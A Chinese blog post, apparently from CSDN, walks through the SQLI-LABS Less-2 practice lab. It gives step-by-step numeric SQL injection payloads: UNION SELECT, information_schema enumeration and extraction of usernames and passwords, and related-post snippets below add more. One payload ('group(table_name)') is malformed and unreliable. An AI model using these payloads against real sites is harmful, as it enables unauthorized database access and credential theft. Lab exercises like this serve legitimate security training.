SQLI-LABS 02.第二关 【显错注入_数字型不闭合】

最新推荐文章于 2024-07-25 22:11:10 发布
最新推荐文章于 2024-07-25 22:11:10 发布
阅读量294 收藏
点赞数
文章标签: 数据库 php mysql web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45284414/article/details/130685057
版权

SQLI-LABS

02.第二关 【显错注入_数字型不闭合】

1.后端PHP源码分析

核心语句
本关的语句:$sql="SELECT * FROM users WHERE id= $id  ;
对比前一关:$sql="SELECT * FROM users WHERE id='$id' ;
闭合方式

不需要闭合

处理思路

不需要关心单引号闭合,只需要最后-- x注释掉后边内容

中间可以构造使用AND OR 拼接语句进行探测

2.探测SQL注入漏洞

step1.判断注入点:
?id=1    and 1=1    -- x  正常显示
?id=1    and 1=2    -- x  显示异常

对比第一关
?id=1'    and 1=1    -- x
?id=1'    and 1=2    -- x
step2.推断字段数:
?id=1    order by 3    -- x  显示正常
?id=1    order by 4    -- x  显示异常
step3.找出显错位 :
?id=-1    union select 1,2,3    -- x  2和3被显示出来
step4.查询库表列:
//查询库名
?id=-1    union select 1,database(),3    -- x
//返回出数据库名为security

//关于information_schema,它是一个库,它有个tables表,
字段有的table_schema table_name create_time 等信息
每行是数据库server中所有database的所有table

//table_schema 是 information_schema.tables 表中的一个列,
用于表示数据库中的表所属的数据库名称。

//为什么要加limit,因为有很多个表名都来自security数据库
查询结果其实会有很多行,可以使用limit逐行显示,或者用group_concat拼接显示

//查询 security 数据库中第一个表的名称,
?id=-1     union 
           select 1,    table_name    ,3 
           from information_schema.tables    //位置 指定某个表
           where table_schema='security'     //条件 限制某些行
           limit 0,1    -- x                 //输出  emails
           
?id=-1     union 
           select 1,    table_name    ,3 
           from information_schema.tables 
           where table_schema='security'
           limit 1,1    -- x                 //输出 referers

?id=-1     union 
           select 1,    table_name    ,3 
           from information_schema.tables 
           where table_schema='security'
           limit 2,1    -- x                 //输出 uagents
           limit 3,1    -- x                 //输出 users
           limit 4,1    -- x                 //输出 为空


?id=-1     union 
           select 1,    group(table_name)    ,3 
           from information_schema.tables 
           where table_schema='security'
           limit 0,1    -- x



//查询某个库某个表的所有列名,逐行显示出

?id=-1     union 
           select 1,    column_name    ,3 
           from information_schema.columns   //位置 某个表
           where table_schema='security' and table_name='users'     
           limit 0,1    -- x                 //输出 id
           limit 1,1    -- x                 //输出 username
           limit 2,1    -- x                 //输出 password
           limit 3,1    -- x                 //输出 为空
step5.查询数据值:
//在users表中,对id列,逐行显示出

?id=-1    union select 1,  id  ,3     from users    limit 0,1    -- x
?id=-1    union select 1,  id  ,3     from users    limit 1,1    -- x
?id=-1    union select 1,  id  ,3     from users    limit 2,1    -- x


?id=-1    union select 1,  username  ,3     from users    limit 0,1    -- x
?id=-1    union select 1,  password  ,3     from users    limit 0,1    -- x
mr_whoami
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
sqli-labs-master靶场第二详解
tangtang_888的博客
07-06 1787
1、点击进入sqli-labs-master靶场第二Less-2 2、输入?id=1' and '1'='1,回显不正常,说明此处为数字型注入 3、依次输入?id=1 order by (1,2,3,4)--+,在输入4时出现报错,说明字段数为3
sqli-labs系列——第二
1匹黑马
04-26 4051
文章目录判断注入类型开始注入 判断注入类型 1' and '1'='1 //错误 1 and 1=1 //正常 所以是数字型注入,所以不需要单引号来闭合前边的参数,但是要用-把参数注释掉,让Mysql执行我们后边的exp 开始注入 这里就不一一去爆了,跟第一的流程是一样的,直接上exp干了: http://192.168.1.113:86/Less-2/?id=-1 union SELE...
sql-labs SQL注入平台——第二Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)
Onlyone_1314的博客
05-28 1626
只返回了2、3说明,后端从数据库中执行SQL语句select 1,2,3;只在前端显示了第2、3个字段,所以我们能看到的就只有第2、3个字段,就要把注入点放在第2、3个位置上。查询id为0的用户肯定是没有返回结果的,这样返回的就只有union联合查询的第二个查询 select 1,2,3;得到security数据库中的表emails,referers,uagents,users。返回结果错误:没有第4列数据,说明只存在三列数据。查询,返回结果按照前4列数据排序。(3)查询当前数据库的名称。
SQL注入Sqli-labs第二
走马
11-06 597
MYSQL数据库的所有表的信息都存储在了information_schema数据库里面的tables这个表里(information_schema.tables中两列table_schema是数据库名,table_name中表名。6.一般账号与密码都会存储在users这个表里面,所以我们要去查看users这个表里面的值,为了需要准确的得出账号与密码,可以先对里面的字段进行查询(information_schema.columns表中三列table_schema是数据库名,本次注入sql-labs的第二
sqli-labs---第二
2201_75556700的博客
05-20 295
5、查users表中的字段名(在使用url的时候可能会报错,需要把where前面的url删掉再输入空格)4、查询表名(在使用url的时候可能会报错,需要把where前面的url删掉再输入空格)id=1 and 1=2 order by 3# 没有报错。id=1 and 1=2 order by 4# 报错。id=1 显示正常。id=1# 显示正常。id=1' 报错。id=1'# 报错。可以知道这里是数字型注入。1、判断是什么类型注入
sqli-labs----第二
wyzhxhn的博客
11-05 363
第二
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个SQL注入SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sqli-labs.rar
12-22
2. SQL注入平台sqli-labs源码:即压缩包内的`sqli-labs`文件夹,包含了各种SQL注入挑战的网页和脚本。 搭建步骤如下: 1. 安装PHPstudy:访问PHPstudy官方网站下载最新版本,根据提示安装到本地计算机上。 2. 启动...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sql注入sqli-labs靶场-第二
qq_61019688的博客
04-25 282
id=1 and 1=1正常回显,?id=1 and 1=2报错,可知这次是数字型注入(同时注意 =数字型注入后面不用再加--+)1.同第一一样,先判断是何种类型的注入。3.爆数据库名和版本信息。
sqli-labs第2
weixin_45626840的博客
04-23 214
直接开始 1、判断注入点 2、判断类型------>有下图可知为数字型 3、判断字段数 4、测试回显列,优先联合注入 5、有回显,优先尝试联合注入 6、接下来查库,查表,查字段,固定套路
【网安自学/web漏洞-day02sqli-labs第二(改为跨站注入
加油~
05-07 285
查询注入点与第一题不一样,其他都一样,所以试一试跨站注入 若一个网页的注入点使用的是root用户,那么可以使用这个注入点跨库查询其他的数据库。 例如:;使用sqil-labs root用户注入进行跨库攻击: 在网站后添加id=1发现显示用户名 判断是否是字符注入 http://127.0.0.1/sqli-labs/Less-2/?id=1’ 根据报错类型判断可能是int类型:http://127.0.0.1/sqli-labs/Less-2/?id=1...
SQL注入sqli-labs-master靶场第1、2
qq_24797991的博客
04-04 910
SQL注入
【详细】 Sqli-labs1~65详解 解题思路+解题步骤+解析
热门推荐
Jay17的博客
08-03 3万+
【详细】 Sqli-labs1~65详解 解题思路+解题步骤+解析 详细,超级详细
sqllab第二笔记
I_WORM的博客
03-13 629
构造payload:id=0%20or%20extractvalue(1,concat(0x7e,database(),0x7e))%20--+构造payload:id=0 union select 1,2,database() --+之后还可以获取表名、字段名、具体内容等信息(这里不做演示了)构造payload:id=0 union select 1,2,3 --+同样的也能通过错误注入的方式获取具体的表名和字段信息。输入id=1/0 发现不打印输出了;发现将输入的内容打印到页面上了;
sqli-labs靶场——第二
最新发布
weixin_57240513的博客
07-25 354
id=1和?id=2-1的页面一样所以是数字型
sqli-labs第二
07-28
回答: SQLI-LABS第二是一个显错注入数字型闭合的挑战。在这个挑战中,通过分析后端PHP源码,我们可以看到核心语句是`$sql="SELECT * FROM users WHERE id= $id ;`。与前一相比,这里的闭合方式不同,没有使用单引号将$id包围起来。\[1\] 为了获取users表的列名,我们可以使用注入语句`?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'`。这个语句利用了UNION操作符和information_schema表来获取列名。\[2\] 通过判断报错信息,我们可以初步确定存在注入点,并且判断出注入点类型为数字型注入。我们还可以猜测出当前表中的列数为3,并确定数据显示位置为2和3。进一步进行信息收集,我们可以得到数据库名为security,数据库版本为5.7.26,操作系统版本为Win64,数据库用户名为root@localhost,数据库路径为E:\site\phpStudy_64\phpstudy_pro\Extensions\MySQL5.7.26\data\。通过指定数据库,我们可以获取库中的表名,得到的表名为emails、referers、uagents和users。然后,通过指定表,我们可以获取表中的列名,得到的列名为id、username和password。最终,我们可以获取到username和password的数据。\[3\] 希望以上信息对你有所帮助! #### 引用[.reference_title] - *1* [SQLI-LABS 02.第二显错注入_数字型闭合】](https://blog.csdn.net/weixin_45284414/article/details/130685057)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [sqli-labs第二](https://blog.csdn.net/weixin_45633277/article/details/122371405)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [sqli-labs----第二](https://blog.csdn.net/wyzhxhn/article/details/127700962)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值